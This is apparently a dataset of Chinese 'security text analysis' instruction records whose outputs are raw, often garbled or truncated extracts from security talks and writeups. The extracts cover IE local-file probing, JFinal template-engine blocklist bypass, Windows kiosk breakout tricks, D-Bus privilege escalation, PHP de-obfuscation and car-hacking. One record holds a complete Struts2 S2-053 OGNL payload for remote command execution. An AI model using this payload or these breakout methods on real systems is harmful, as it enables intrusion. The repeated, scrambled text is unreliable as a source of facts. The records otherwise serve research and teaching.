{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2013 NSFOCUS www.nsfocus.com nsfocus.com www.nsfocus.com nsfocus.com 瀏覽器和本地域 public 於暘 綠盟科技研究院 Who am I @tombkeeper on twitter Researcher @NSFOCUS Security Labs SCADA/ICS security research Focus on: APT/0-day attacks detection Vulnerability research Exploit technology Some other geek things 流覽器的域 域的意義數據隔離 許可權隔離尤其是 IE 跨域漏洞繞過域隔離 特殊的域file:// IE對域的分類安全設置 主要內容 從網路域探測本地路徑 從網路域讀取本地檔 從本地域讀取本地檔 從網路域探測本地路徑 function probeImage( url ) function probeImage( url ) function probeImage( url ) function probeImage( url ) {{{{ var img = new Image(); var img = new Image(); var img = new Image(); var img = new Image(); img.onerror = function(){ img.onerror = function(){ img.onerror = function(){ img.onerror = function(){ alert( url + \"exists\"); alert( url + \"exists\"); alert( url + \"exists\"); alert( url + \"exists\"); }; }; }; }; img.onload = function(){ img.onload = function(){ img.onload = function(){ img.onload = function(){ alert( url + \"do alert( url + \"do alert( url + \"do alert( url + \"doeeees not exist\"); s not exist\"); s not exist\"); s not exist\"); } } } } img.src = url; img.src = url; img.src = url; img.src = url; }}}} 曾經對file://有效 利用預設共用路徑繞過檢查 function probeImage( url ) function probeImage( url ) function probeImage( url ) function probeImage( url ) {{{{ var img = new Image(); var img = new Image(); var img = new Image(); var img = new Image(); img.onerror = function(){}; img.onerror = function(){}; img.onerror = function(){}; img.onerror = function(){}; img.onload = function(){alert( img.onload = function(){alert( img.onload = function(){alert( img.onload = function(){alert(hello pony hello pony hello pony hello pony');} ');} ');} ');} img.src = url; img.src = url; img.src = url; img.src = url; }}}} var qqid = \" var qqid = \" var qqid = \" var qqid = \"10001 10001 10001 10001\"; \"; \"; \"; var qqdatapath = \"\\\\\\\\127.0.0.1\\\\C$\" + var qqdatapath = \"\\\\\\\\127.0.0.1\\\\C$\" + var qqdatapath = \"\\\\\\\\127.0.0.1\\\\C$\" + var qqdatapath = \"\\\\\\\\127.0.0.1\\\\C$\" + \"\\\\Program Files\\\\Tencent\\\\QQ2009\\\\Users\\\\\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker Enjoy模板引擎分析 前置 先有关Enjoy模板引擎的些描述可以看这https://jfinal.com/doc/6-1 档中值得关注的点 属性访问触发get法 在官档我们可以看到很多有趣的东西(当然我会更关注于些相关的)如属性访问 的这条描述可以让我们去触发对象的get法(前提是public修饰) 法调 由于模板引擎的属性取值表达式极为常所以对其在户体验上进了符合直觉的扩展field 表 达式取值优先次序以 user.name 为例 如果 user.getName() 存在则优先调 如果 user 具有 public 修饰过的name 属性则取 user.name 属性值注意jfinal 4.0 之前这条规则的优先级最低 关于法调也有些描述说可以直接调对象上的任何public法使规则与java中调 式保持致当然也不是所有法都能调在源码的调试过程当中发现有些法在 名单当中 除此以外也有名单类 getClass wait notifyAll getClassLoader invoke notify getDeclaringClass removeForbiddenMethod removeForbiddenClass suspend resume loadLibrary forName newInstance exit halt stop java.lang.ThreadGroup java.lang.ProcessBuilder java.lang.System java.lang.ClassLoader java.lang.reflect.Proxy java.lang.Runtime java.lang.Thread java.lang.Class com.jfinal.template.expr.ast.MethodKit java.io.File java.lang.reflect.Method java.lang.InheritableThreadLocal java.lang.Process 因此也给了我们更多的限制 静态属性访问 来个例就懂了 静态法的调 同时持调静态属性上的法 引擎执流程简单分析 java.lang.ThreadLocal java.lang.Package java.lang.SecurityManager java.lang.Compiler java.lang.RuntimePermission #if(x.status == com.demo.common.model.Account::STATUS_LOCK_ID) <span>(账号已锁定)</span> #end #if(com.jfinal.kit.StrKit::isBlank(title)) .... #end (com.jfinal.MyKit::me).method(paras) 以下不感兴趣可以直接略过因为不需要些很详细的分析就能bypass只要我们知道过滤了 哪些类哪些法针对绕过即可这权当好奇看看如何实现的当然分析也只会主要去 看些能让我成功实现执不安全函数的式(指的是 #() 与 #set() 两种)根据对档的阅 读个认为其他标签对于我意义不因为我如果能够执个命令我需要的是能够回显 # () 或者我不能通过步执需要通过 #set(a=xxx) 的式去拆分保存变量做中转因此 我在分析调试的过程当中只会针对这两个标签进分析 为了独分析这引了maven坐标 个基本的使很简单为了便调试我写了个很简单的类 先由于默认未开启缓存默认第个分 <dependency> <groupId>com.jfinal</groupId> <artifactId>enjoy</artifactId> <version>4.9.21</version> </dependency> package com.example.ezsb; public class User { public static void run(){ try{ Runtime.getRuntime().exec(\"open -na Calculator\"); }catch (Exception e){ } } } Template template = engine.getTemplateByString(\"# (com.example.ezsb.User::run())\"); template.renderToString(); 接下来我们看 com.jfinal.template.Engine#buildTemplateBySource ,同样我们只需要 更关注于解析部分也就是 parser.parse() 接下来我们先跟下这个遍历字符串解析toke", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Application Escape and Breakout ## Summary * [Gaining a command shell](#gaining-a-command-shell) * [Sticky Keys](#sticky-keys) * [Dialog Boxes](#dialog-boxes) * [Creating new files](#creating-new-files) * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance) * [Exploring Context Menus](#exploring-context-menus) * [Save as](#save-as) * [Input Boxes](#input-boxes) * [Bypass file restrictions](#bypass-file-restrictions) * [Internet Explorer](#internet-explorer) * [Shell URI Handlers](#shell-uri-handlers) * [References](#references) ## Gaining a command shell * **Shortcut** * [Window] + [R] -> cmd * [CTRL] + [SHIFT] + [ESC] -> Task Manager * [CTRL] + [ALT] + [DELETE] -> Task Manager * **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\\windows\\system32\\`), we can simply right click and `open` it * **Drag-and-drop**: dragging and dropping any file onto the cmd.exe * **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` * **Task Manager**: `File` > `New Task (Run...)` > `cmd` * **MSPAINT.exe** * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels * Zoom in to make the following tasks easier * Using the colour picker, set pixels values to (from left to right): ```ps1 1st: R: 10, G: 0, B: 0 2nd: R: 13, G: 10, B: 13 3rd: R: 100, G: 109, B: 99 4th: R: 120, G: 101, B: 46 5th: R: 0, G: 0, B: 101 6th: R: 0, G: 0, B: 0 ``` * Save it as 24-bit Bitmap (*.bmp;*.dib) * Change its extension from bmp to bat and run ## Sticky Keys * Spawn the sticky keys dialog * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` * Hit 5 times [SHIFT] * Visit \"Ease of Access Center\" * You land on \"Setup Sticky Keys\", move up a level on \"Ease of Access Center\" * Start the OSK (On-Screen-Keyboard) * You can now use the keyboard shortcut (CTRL+N) ## Dialog Boxes ### Creating new files * Batch files  Right click > New > Text File > rename to .BAT (or .CMD) > edit > open * Shortcuts  Right click > New > Shortc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRCE 0x00 NO p java0day https://t.zsxq.com/EAMb2V3 https://t.zsxq.com/3jQ7Y3B checklist 0x01 1. 2. 3. payload 4. rce 5. 1. 2. 3. 0x02 1. xxxxxx 2. payload 3. F8 0x03 1. source 2. sink 3. 4. trick 111RCE 1312 4513 trick 0x04 SQL SQL XSS Javascriptcookie javagadget SSRF owasp RCEcombo 1. + 2. + 3. ++PHPwebshellLinuxcrontab 4. +SSRF++ 5. + 6. +SSRF+ 1. XSS+electron 2. +fastjson 3. +XSS+electron comboRCE SSRFXXESSRF combo SSRF web RCE 0x05 RCE 1. combo 2. combosink 3. RCE 4. 5. 6. trick 7. 8. RCE 0x06 RCE gadget 0day 0x07 345 jumpservergrafanaGo Go just do it", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1996 Sun Microsystems, Inc. '\\\" Copyright (c) 1998-1999 by Scriptics Corporation. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: socket.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of descript", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从S-SDLC视角看API安全 API威胁检测防御专题研讨会 Silver Zhang 为何将API安全拧出来说 为何将API安全拧出来说 感冒 VS. 禽流感 感冒 VS. 禽流感 应用安全 VS. 移动安全 应用安全 VS. 移动安全 新业态 新业态 API历史沿革及风险评估 API面临的安全挑战 传输 存储 认证 授权 输入 输出  客 户 端 不 支 持 加 密 传 输 协 议 怎 么 办  客 户 需 要 走 非 加 密 支 持 代 理  客 户 端 未 做 服 务 端 证 书 合 法 有 效 性 校 验 怎 么 办  服 务 端 加 密 数 据 如 何 让 客 户 端 解 密  客 户 的 服 务 端 与 客 户 端 都 在 使 用 同 一 API  密 钥 泄 露 了 怎 么 办  客 户 的 客 户 端 与 服 务 端 都 支 持 登 录 过 程 处 理  无 人 参 与 的 设 备 登 陆 认 证 问 题  设 备 更 换 主 人  预 设 权 限 与 客 户 业 务 映 射  不 充 分 的 授 权 业 务 架 构  不 正 确 的 授 权 ID 的 使 用  API 服 务 提 供 方 输 入 验 证  API 提 供 方 输 入 验 证  调 用 方 输 入 验 证 匹 配 性  输 出 编 码  不 同 的 输 出 编 码 -CSV/JASON  仅 输 出 必 要 的 内 容 IoT攻击面分析 攻击面 是否涉及API 攻击面 是否涉及API 生态系统  第三方后端API  设备内存 x 更新机制  设备物理接口 乄 移动应用  设备Web界面  供应商后端API  设备固件 乄 生态系统交互  设备网络服务 乄 网络流量 乄 管理界面  认证/授权  本地数据存储 乄 隐私  云Web界面 乄 硬件传感器 乄 S-SDLC & API安全 需求 设计 实现 确认 DevOps 运维 场景 传输 乄 乄 乄 乄 乄 乄  存储     乄   认证     乄   授权     乄   输入     乄   输出     乄   API安全 API安全 API安全检测技术 人为构造所有可能的应用场景的Demo,通过正常应用安全测试完成 与功能性自动化脚本融合同步完成安全自动化测试 借助现存的典型用户客户端完成全功能安全测试 借助于Fuzz Test技术完成安全性测试 借助于IAST技术完成安全性测试 借助于RASP技术完成与业务强相关的恶意行为监测 问题讨论-1 如 何 避 免 过 度 实 现 尚 未 开 放 的 功 能  1. 无人知道对外提供的API竟然可以以 服务提供方的超级管理员身份登录 进去 2. 现实是开发为了方便放开了口子 3. 挑战如何从根本上避免这样的问 题出现 *API特殊性决定了它一定会被深度使用* 1. 无人知道对外提供的API竟然可以以 服务提供方的超级管理员身份登录 进去 2. 现实是开发为了方便放开了口子 3. 挑战如何从根本上避免这样的问 题出现 *API特殊性决定了它一定会被深度使用* 问题讨论-2 如 何 确 保 API 只 输 出 当 前 功 能 所 必 需 要 的 信 息  1. 开发我知道这些信息未来用得上 所以干脆直接将更多的信息一并传 回客户端反正前端也不会有人使 用它们 2. 现实批量敏感信息泄漏 3. 挑战如何从根本上避免这样的问 题出现 *API特殊性决定了它一定会被深度使用* 1. 开发我知道这些信息未来用得上 所以干脆直接将更多的信息一并传 回客户端反正前端也不会有人使 用它们 2. 现实批量敏感信息泄漏 3. 挑战如何从根本上避免这样的问 题出现 *API特殊性决定了它一定会被深度使用* 问题讨论-3 最佳 实践 与现 实之 间的 矛盾 1. Web端提供多因子认证 2. 手机端API则不提供 1易用性考虑 2 客户的客户端不支持 *API特殊性决定了它一定会被深度使用* 1. Web端提供多因子认证 2. 手机端API则不提供 1易用性考虑 2 客户的客户端不支持 *API特殊性决定了它一定会被深度使用*", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 浅谈PHP源代码保护案&受保护PHP代码の解 密还原 前 PHP 加密案分析 扩展案 源代码混淆 解密 动化通解密 PHP扩展案 源代码混淆 解密 动化通解密 opcode 还原代码 附录 PHP扩展编译 总结 参考 php是种解释型脚本语. 与编译型语不同,php源代码不是直接翻译成机器语.是翻译成中间代码(OPCODE) ,再由解释器 (ZEND引擎)对中间代码进解释运 . 在php源代码的保护在原理可以分为3类. 源代码混淆(编码) OPCODE混淆(编码) 修改解释引擎(虚拟机) 前    2 在部署上可以分为2类. 扩展 有扩展 下分析下各种加密案的实现法 扩展的加密在些开发者较常 这种源代码保护式侵性需对服务器做额外的配置兼容性较强 这种情况混淆后的源代码还原常简单可完全还原出源代码 有时连注释都会保留 (x 我觉得这种混 淆都不能称之为加密 基本流程 压缩代码->混淆变量函数类名->使简单函数和法进编码加密 例:base64 异或 看到这种的php不要慌 这种处理后的件 解密流程的变量和函数名使了量的打印字符 按照正常 的流程就可以 ctrl+alt+l 快捷键 格式化代码 (这使的PhpStorm 其他IDE 格式化遇到特殊符号可能出问题 这提前 调整好了件编码)   PHP 加密案分析 扩展案 源代码混淆 解密 3 这有个php的特性 php中的base64遇到base64表中字符会直接忽略 不会影响解码 注: PHP7 遇到空字符可能会抛出error 可以使php5.6执 (这有个兼容性问题 ) 遇到这种加密最简单的法就是找件中最后步执的函数 直接把内容打印出来 4 这种编码法最后步肯定要使eval执还原后的php代码 所以打印最后个函数基本上php代码就 会全部出来 (x 前操作顿毫卵 注: 有保护案也使了call_user_func或call_user_func_array间接调eval 成功还原源代码 <?php phpinfo();?> 动化通解密 5 PHP提供了强的扩展功能 可以直接通过编写php扩展hook eval相关函数 获取执的源代码 HOOK php zend引擎的 zend_compile_string zend_include_or_eval 函数达到的 这演示的是 hook zend_compile_string 函数 6 C 复制代码 /* $Id$ */ #include \"php.h\" #include \"ext/standard/info.h\" static zend_op_array* (*old_compile_string)(zval *source_string, char *filename TSRMLS_DC); static zend_op_array* evalhook_compile_string(zval *source_string, char *filename TSRMLS_DC) { if(strstr(filename, \"eval()'d code\")) { printf(\"\\n------eval-------\\n%s\\n------eval------- \\n\",Z_STRVAL_P(source_string)); } return old_compile_string(source_string, filename TSRMLS_CC); } PHP_MINIT_FUNCTION(evalhook) { return SUCCESS; } PHP_MSHUTDOWN_FUNCTION(evalhook) { return SUCCESS; } PHP_RINIT_FUNCTION(evalhook) { old_compile_string = zend_compile_string; zend_compile_string = evalhook_compile_string; return SUCCESS; } PHP_RSHUTDOWN_FUNCTION(evalhook) { zend_compile_string = old_compile_string; return SUCCESS; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 7 成功还原源代码 PHP扩展案 PHP_MINFO_FUNCTION(evalhook) { php_info_print_table_start(); php_info_print", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n国 产 智 能 网 联 汽 车 漏 洞 挖 掘 中 的 几 个 突 破 点 马良 绿盟科技 格物实验室 安全研究员 自我介绍 马良 绿盟科技 格物实验室 安全研究员 十多年嵌入式软硬件开发经验, 喜欢DIY一些东西  2016 - Xpwn西门子PLC蠕虫演示  2018 - 看雪开发者大会智能设备固件提取的十种方法  2018 - 极棒机器特工挑战赛关闭激光报警器电源窃听器放置气球遮挡摄像头等  2018 - JD-HITB介绍Vocore2模块在安全研究中的应用提出一种工控设备攻击模型  2021 - 极棒我是极客改装电源插座, 通过4G用电力猫安全缺陷远程控制内网设备 1 概 述 2 3 4 常用的几个小工具 汽车工程模式与固件提取 目 录 典型案例分享 概 述  常用软硬件  固件提取  工程模式  案例  IVI(车载信息娱乐系统)  ADAS(辅助驾驶) 1 概 述 2 3 4 常用的几个小工具 汽车工程模式与固件提取 目 录 典型案例分享 测车常用工具 出去测试车一般要带一些工具例如  各种接口的USB线  USB转TTL模块(各种常见电压:5V/3.3V/1.8V)  各种容量的tf卡和读卡器U盘  网络抓包的HUB车载以太网转换器  Wi-Fi抓包环境蓝牙抓包环境  CAN总线抓包分析和重放的软件和硬件  CAN总线Fuzz模块  HarkRF One with Portapack H2 或 其它SDR  调试用的安卓手机(Root装好各种调试软件)各种APK分析工具 CAN总线收发和Fuzz工具 USBTin  软硬件开源(www.fischl.de/usbtin)  CAN协议探测(USBtinViewer)  Fuzz工具:CanToolz Wi-Fi快速抓包环境搭建 受控的可抓包热点用于各种智能设备测试  硬件: 随身Wi-Fi  笔记本电脑+手机USB口共享流量  Wireshark/Fiddler4嗅探重放解密 笔记本电脑 USB1 USB2 手机 开网络流量共享 随身Wi-Fi 被测设备 HarkRF One with Portapack H2(SDR 用于智能设备无线测试  无线流量的频段嗅探  无线流量的抓取和重放  GPS的模拟  软件: Universal Radio Hacker(URH) 1 概 述 2 3 4 常用的几个小工具 汽车工程模式与固件提取 目 录 典型案例分享 工程模式与固件提取内容摘要  经费预算少研究车联网去哪里买车联网部件  如何确定未知电路板的电源引脚CAN引脚以太网引脚?  车厂是怎么开发调试和维护的汽车系统的  安全研究员一般怎么进入系统内部  怎么搞到对应车型的固件升级包  进入工程模式有密码怎么办?  固件有哪些常见的风险点 找研究目标  买整车  租车  广州陈田村一日游  咸鱼  后装/改装市场  4S店  报废车事故车渠道 某车 IVI 接口定义  电源  USB  CAN 智能设备的电源原理图  输入是5V电源  D1作用是防止电源反接  C01C02是电源输入滤波电容  C03C04是输出滤波电容  VDD3.3是3.3V电源 没官方资料找电源引脚的办法  电源电压一般是12V也可向卖家确认  万用表先找到地--- GND 电路板上的地一般都是连在一起的 地一般和大块铜皮相连 CPU旁边的小电容一般有一端接地 每个芯片都要接地  一般有大电容且集中的地方是电源电路  地和VCC一般走线比较粗  VCC可能经过一个大的二极管防接反  VCC经过稳压等芯片转换成其它电压(可查手册确认)  金属外壳的接插件一般外壳焊在板子上的一般都是GND GND VCC 没官方资料找电路通信引脚的办法  CAN管脚一般通过电感和CAN控制芯片连接  以太网引脚一般和以太网PHY芯片连接  查找对应芯片的手册知道芯片功能  如果看不清芯片型号可以用手机微距镜头拍摄  如果手机没有微距镜头可以买外置微距镜头  观察芯片标识: 也可买专门的电子显微镜 固件提取中破解芯片保护或绕过登陆的方法  智能设备漏洞挖掘中的几个突破点发现大家感兴趣的是固件提取方法  电压故障注入:敲开芯片内存保护的最后一扇门付鹏飞  电磁故障注入PicoEMP(github.com/newaetech/chipshouter-picoemp) 电磁故障注入场景 汽车工程模式 汽车内置的一种模式用在开发生产测试维护等场合进入可能要密码功能如下:  可以开调试模式例如打开安卓系统的ADB shell  导出一些内部日志(一般导出到U盘)  查看和修改汽车的一些参数配置  汽车仪表的自我诊断  进行本地升级操作 以下是某款车工程模式菜单 另一款汽车的工程模式 工程模式本身不是漏洞是我们进入汽车内部继续研", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWays for Web Dogs to Find Linux Privilege Escalation Vulnerabilities Hunting Vulnerabilities of D-Bus Services Ricter Z @ 360 Noah Lab $ cat /AGENDA.txt  What is D-Bus?  D-Bus authentication and PolicyKit  D-Bus services debug tricks  Common exploits for Linux privilege escalation  Real-word examples: polkit CVE, ... 1. What is D-Bus? $ man dbus An IPC/RPC message bus framework  System Bus: system apps <-> user apps  Session Bus: user apps <-> user apps By default, dbus-daemon listens on a UNIX socket and extracts uid from incoming connections (SO_PEERCRED) TCP port is also being supported $ whereis dbus-service root@server:/usr/share/dbus-1/system-services# ls -la total 60 drwxr-xr-x 2 root root 4096 Apr 9 15:30 . drwxr-xr-x 8 root root 4096 Apr 13 16:18 .. -rw-r--r-- 1 root root 113 Mar 14 19:41 io.netplan.Netplan.service -rw-r--r-- 1 root root 130 Sep 23 2020 org.freedesktop.PackageKit.service -rw-r--r-- 1 root root 133 Feb 21 20:58 org.freedesktop.PolicyKit1.service -rw-r--r-- 1 root root 114 Dec 10 2019 org.freedesktop.UPower.service -rw-r--r-- 1 root root 424 Apr 2 2020 org.freedesktop.hostname1.service -rw-r--r-- 1 root root 455 Apr 2 2020 org.freedesktop.locale1.service -rw-r--r-- 1 root root 453 Apr 2 2020 org.freedesktop.login1.service -rw-r--r-- 1 root root 457 Apr 2 2020 org.freedesktop.network1.service -rw-r--r-- 1 root root 457 Apr 2 2020 org.freedesktop.resolve1.service $ whereis dbus-service root@server:/usr/share/dbus-1/system-services# cat org.freedesktop.UPower.service [D-BUS Service] Name=org.freedesktop.UPower Exec=/usr/lib/upower/upowerd User=root SystemdService=upower.service $ whereis dbus-service root@server [ /usr/lib/systemd/system ]# cat systemd-timedated.service [Unit] Description=Time & Date Service Documentation=man:systemd-timedated.service(8) man:localtime(5) Documentation=https://www.freedesktop.org/wiki/Software/systemd/timedated [Service] ExecStart=/lib/systemd/systemd-timedated BusName=org.freedesktop.timedate1 WatchdogSec=3min C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/sf/app/apache_portal/bin/httpd /etc/profile/root/.bash_profile /etc/bashrc/root/.bashrc /etc/profile.d/*.sh/etc/profile.d/lang.sh /etc/sysconfig/i18n/etc/rc.local/etc/rc.d/rc.local /etc/rc.local /etc/rc.d/rc.local /etc/profile.d/ /etc/init.d systemctl systemctl list-units --type=service /usr/lib/systemd/system crontab cat /etc/crontab  ssl443httpd 0x00 0x01 0x02 /sf/app/apache_portal/bin/httpd /usr/lib/systemd/system /sf/app/apache_portal/bin/httpd systemctl list-units --type=service # systemd-user-sessions.service Permit User Sessions sangfor-session_check.service Sangfor session_check systemd-vconsole-setup.service Setup Virtual Console systemd-logind.service Login Service #web sangfor-conhttpd.service Sangfor EMM Http Server sangfor-boa.service Sangfor WebUI Http Server sangfor-ntwf_framework.service Sangfor ntwf framework(node_twf) sangfor-php-fpm.service Sangfor PHP-FPM Service sangfor-ssllogs.service Sangfor WebUI Ssllogs Service #vpn sangfor-svpn.service Sangfor SSLVPN Core Service [root@sslvpn system]# cat sangfor-svpn.service [Unit] Description=Sangfor SSLVPN Core Service After=sangfor-env.service sangfor-module.service sangfor-net.service sangfor-ntwf_framework.service [Service] CPUQuota=160% Type=forking EnvironmentFile=/etc/sysconfig/sangforenv ExecStart=/sf/app/svpn/svpn_ctrl start ExecReload=/sf/app/svpn/svpn_ctrl restart ExecStop=/sf/app/svpn/svpn_ctrl stop # We want systemd to give httpd some time to finish gracefully, but still want # it to kill httpd after TimeoutStopSec if something went wrong during the # graceful stop. Normally, Systemd sends SIGTERM signal right after the # ExecStop, which would kill httpd. We are sending useless SIGCONT here to give # httpd time to finish. KillSignal=SIGTERM PrivateTmp=false Restart=always RestartSec=5 [Install] WantedBy=multi-user.target ExecStart=/sf/app/svpn/svpn_ctrl start  /sf/app/apache_portal/bin/httpd  /sf/app/apache_portal/bin/apachectl start -DIS_GM_DEV systemctl stop sangfor-svpn.service  systemctl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIOActive, Inc. Copyright 2015. All Rights Reserved. Abusing XSLT for Practical Attacks Fernando Arnaboldi Senior Security Consultant IOActive, Inc. Copyright 2015. All Rights Reserved. Why XSLT ? IOActive, Inc. Copyright 2015. All Rights Reserved. Why XSLT ?  XML vulnerabilities are fun. They may get you passwords.  So I read about:  XML  Schemas  XSLT (this presentation) IOActive, Inc. Copyright 2015. All Rights Reserved. Objectives of this talk  Analyze common weakness in XSLT  Exploit implementations flaws IOActive, Inc. Copyright 2015. All Rights Reserved. Who is this talk for ?  Code reviewers  Developers using XML and XSLT  Anyone trying to abuse stuff IOActive, Inc. Copyright 2015. All Rights Reserved. And why would you care ?  XSLT processors (parsers) are still affected by these flaws  These flaws may have an impact on you and your customers integrity and confidentiality  These flaws are using XSLT functionality. There are no payloads to be detected by antivirus. IOActive, Inc. Copyright 2015. All Rights Reserved. Agenda  Introduction to your target  Numbers  Random numbers  Bypass the same origin policy  Information Disclosure (and File Reading) through Errors IOActive, Inc. Copyright 2015. All Rights Reserved. Introduction IOActive, Inc. Copyright 2015. All Rights Reserved. Introduction  What this does and which software does it ?  Attack vectors  Identify target IOActive, Inc. Copyright 2015. All Rights Reserved. What does XSLT do ?  XSLT is a language used to manipulate or transform documents  It receives as input an XML document  It outputs a XML, HTML, or Text document IOActive, Inc. Copyright 2015. All Rights Reserved. XSLT Versions  There are three different XSLT versions: v1, v2 and v3  XSLT v1 the most implemented version:  Because higher XSLT versions support previous versions.  Because it is the only one supported by web browsers IOActive, Inc. Copyright 2015. All Rights Reserved. Which software was tested ?  Server side processors:  Command lin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# S2-053 远程代码执行漏洞 影响版本: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10 漏洞详情: - http://struts.apache.org/docs/s2-053.html - https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&mid=2247483663&idx=1&sn=6304e1469f23c33728ab5c73692b675e ## 测试环境搭建 ``` docker compose up -d ``` 环境运行后访问`http://your-ip:8080/hello.action`即可看到一个提交页面 ## 漏洞复现 Struts2在使用Freemarker模板引擎的时候同时允许解析OGNL表达式导致用户输入的数据本身不会被OGNL解析但由于被Freemarker解析一次后变成离开一个表达式被OGNL解析第二次导致任意命令执行漏洞 输入如下Payload即可成功执行命令 ``` %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} ``` ![](01.png) 说明有的同学说无法复现漏洞经过我的测试我发现上述Payload末尾的**换行**不能掉也就是说payload后面必须跟一个换行虽然我也不知道为什么再发送即可成功", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nssh-copy-id === 把本地的ssh公钥文件安装到远程主机对应的账户下 ## 补充说明 **ssh-copy-id命令** 可以把本地主机的公钥复制到远程主机的authorized_keys文件上ssh-copy-id命令也会给远程主机的用户主目录home和`~/.ssh`, 和`~/.ssh/authorized_keys`设置合适的权限 **ssh-copy-id** 使用ssh登陆远程服务器一般是通过密码校验用户身份所以在sshd的配制中应该启用密码校验方式 将/etc/ssh/sshd_config中的PasswordAuthentication设置为yes之后重启sshd ### 语法 ```shell ssh-copy-id [-i [identity_file]] [user@]machine ``` ### 选项 ```shell -i指定公钥文件 ``` ### 实例 1把本地的ssh公钥文件安装到远程主机对应的账户下 ```shell ssh-copy-id user@server ssh-copy-id -i ~/.ssh/id_rsa.pub user@server ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Cool Recovery Concept Category: Forensics ## Description > I received this image from my partner in Intro. to Computer Networks and it seems to be corrupted, can you fix it? A PNG file was attached. ## Solution From the challenge title we can already guess that we will be dealing with CRC mismatches. The PNG we've downloaded is corrupted, as confirmed by `pngcheck`: ```console root@kali:/media/sf_CTFs/technion/Cool_Recovery_Concept# pngcheck cool_recovery_concept.png cool_recovery_concept.png invalid IHDR image dimensions (0x0) ERROR: cool_recovery_concept.png ``` Looks like the image width and height are set to 0, which is invalid. So, we'll try to search for the correct width and height values, checking ourselves against the IHDR CRC. When we find good values, we'll fix the image and write the result to a new file. In order to abstract away the implementation details of a PNG file and concentrate on the high-level logic, we'll use a \"toy\" PNG module which supports more or less the bare minimum for this challenge. First, the solution: ```python from png import Png with open(\"cool_recovery_concept.png\", \"rb\") as f: image = Png(f) assert(image.ihdr.is_crc_valid() == False) print(\"Searching for width, height which will provide CRC value {}\" .format(hex(image.ihdr.crc))) for h in 